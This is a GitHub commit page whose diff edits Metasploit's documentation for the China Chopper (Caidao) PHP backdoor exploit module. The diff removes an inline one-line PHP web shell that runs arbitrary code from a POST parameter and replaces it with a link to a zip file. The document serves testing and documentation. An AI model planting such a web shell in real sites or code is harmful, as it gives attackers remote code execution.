Skip to content

Commit 1065b4c

Browse files
authored
Linked the zip file
1 parent 139d431 commit 1065b4c

File tree

1 file changed

+1
-5
lines changed

1 file changed

+1
-5
lines changed

documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md

Lines changed: 1 addition & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -2,11 +2,7 @@ China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye
22

33
## Vulnerable Application
44

5-
Here is the PHP code of the backdoor that you can use and save it as caidao.php:
6-
7-
```
8-
<?php @eval($_POST["chopper"]);?>
9-
```
5+
Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
106

117
## Verification Steps
128

0 commit comments

Comments
 (0)